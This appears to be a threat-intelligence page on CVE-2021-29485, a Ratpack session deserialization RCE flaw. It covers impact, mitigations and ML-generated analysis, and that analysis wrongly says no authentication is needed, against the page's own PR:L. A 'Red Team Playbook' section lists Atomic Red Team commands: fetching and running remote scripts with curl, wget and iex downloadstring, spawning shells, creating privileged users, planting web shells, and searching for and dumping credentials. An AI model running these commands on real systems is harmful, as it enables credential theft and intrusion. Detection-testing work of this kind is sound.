CVE-2021-29485
Overview
This vulnerability is a Java deserialization flaw in the Ratpack session store component, specifically affecting versions prior to 1.9.0. The root cause is the unsafe deserialization of untrusted data within the session mechanism, allowing crafted gadget chains to be executed. The affected feature is Ratpack's session serialization and deserialization process, which lacks strict input validation or allow-listing prior to version 1.9.0.
Vulnerability Description
Ratpack is a toolkit for creating web applications. In versions prior to 1.9.0, a malicious attacker can achieve Remote Code Execution (RCE) via a maliciously crafted Java deserialization gadget chain leveraged against the Ratpack session store. If one's application does not use Ratpack's session mechanism, it is not vulnerable. Ratpack 1.9.0 introduces a strict allow-list mechanism that mitigates this vulnerability when used. Two possible workarounds exist. The simplest mitigation for users of earlier versions is to reduce the likelihood of attackers being able to write to the session data store. Alternatively or additionally, the allow-list mechanism could be manually back ported by providing an alternative implementation of `SessionSerializer` that uses an allow-list.
Impact
An attacker with the ability to write to the Ratpack session data store can execute arbitrary code remotely on the affected system, leading to complete compromise of the application environment. This requires at least low-level privileges to influence session data (PR:L) and network access (AV:N), but no user interaction (UI:N). The vulnerability has a high impact on confidentiality, integrity, and availability (C:H/I:H/A:H) as per the CVSS vector, enabling unauthorized control over the application and potentially the hosting infrastructure.
Solution
Users should upgrade Ratpack to version 1.9.0 or later, which implements a strict allow-list mechanism in the SessionSerializer to prevent unsafe deserialization. For earlier versions, mitigation includes restricting write access to the session data store or manually backporting the allow-list by implementing a custom SessionSerializer. Detailed patch and mitigation instructions are available in the official advisory at https://github.com/ratpack/ratpack/security/advisories/GHSA-hc33-32vw-rpp9.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Ratpack web application toolkit arises from its handling of Java object serialization, specifically within the session management component. In versions prior to 1.9.0, the framework does not adequately validate serialized objects before deserializing them, allowing an attacker to craft a malicious payload that exploits this weakness. By leveraging a specially designed gadget chain, an attacker can execute arbitrary code on the server, leading to Remote Code Execution (RCE). This flaw is particularly concerning because it can be triggered without requiring any authentication, making it accessible to unauthenticated users who can manipulate session data.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could, for instance, send a crafted request to a vulnerable application that utilizes Ratpack’s session store. If the application processes this request without proper validation, the attacker’s payload could be executed on the server. Scenarios may include an attacker gaining control over the server environment, allowing them to deploy malware, exfiltrate sensitive data, or manipulate application behavior. Given the nature of web applications, where session management is often integral to user interactions, the potential for widespread exploitation is significant, especially in environments where security measures are lax.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Ratpack for their web applications. The ability to execute arbitrary code remotely can lead to data breaches, service disruptions, and significant reputational damage. Businesses may face regulatory penalties if sensitive customer data is compromised. Additionally, the financial implications of remediation efforts, including incident response, system recovery, and potential legal liabilities, can be substantial. The risk is compounded in sectors such as finance, healthcare, and e-commerce, where the integrity and confidentiality of data are paramount.
To detect and mitigate this vulnerability, organizations should first assess their use of Ratpack and determine whether they are running a version prior to 1.9.0. For those still on earlier versions, immediate steps should be taken to reduce the attack surface. This can include limiting write access to the session data store, thereby minimizing the potential for an attacker to inject malicious payloads. Furthermore, implementing a custom `SessionSerializer` that employs an allow-list mechanism can provide an additional layer of protection. Organizations should also consider upgrading to the latest version of Ratpack, which includes built-in mitigations against this type of attack.
In conclusion, the vulnerability in Ratpack highlights the critical importance of secure coding practices, particularly in the context of serialization and deserialization processes. As web applications increasingly rely on complex data structures and session management, developers must remain vigilant against potential exploitation vectors. By adopting robust security measures and keeping software up to date, organizations can significantly reduce their risk exposure and safeguard their applications against emerging threats.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-29485, with new telemetry indicating the initial appearance of exploitation attempts targeting vulnerable Ratpack session stores. Although the overall EPSS score has slightly decreased, suggesting a modest reduction in predicted exploit likelihood, the emergence of these detections signals active interest by threat actors in leveraging this deserialization vulnerability. This development matters because it confirms that adversaries are operationalizing the flaw despite mitigations in Ratpack 1.9.0 and available workarounds. Defenders should interpret this as an indication that unpatched or improperly configured environments remain at tangible risk of remote code execution attacks. While no new exploit variants or ransomware affiliations have been identified, the presence of exploitation attempts elevates the threat level from theoretical to practical, underscoring the need for continued vigilance in monitoring and response efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ratpack Project | Ratpack | All |
cpe:2.3:a:ratpack_project:ratpack:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
55%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-29485 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/ratpack/ratpack/security/advisories/GHSA-hc33-32vw-rpp9 |
| mvnrepository.com |
GitHub CVE
x_refsource_MISC
|
https://mvnrepository.com/artifact/io.ratpack/ratpack-core |